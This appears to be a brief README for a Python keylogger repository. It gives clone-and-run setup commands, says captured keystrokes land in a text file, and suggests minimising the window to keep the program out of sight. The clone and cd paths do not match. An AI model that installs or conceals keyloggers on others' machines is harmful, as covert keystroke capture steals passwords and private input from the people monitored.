sudoAPWH/Python-Keylogger/README.md

 git clone https://github.com/sudoAPWH/Python-Keylogger.git t && cd keylogger && chmod +x install_and_run.command keylogger.py

 Step 2, find the cloned directory, click the .command file, and there! you are set up!
+You should find the logged key strokes in a .txt file in the directory.

+Note: this program will NOT run in the backround, I suggest you minimise the window to make it not show on your desktop.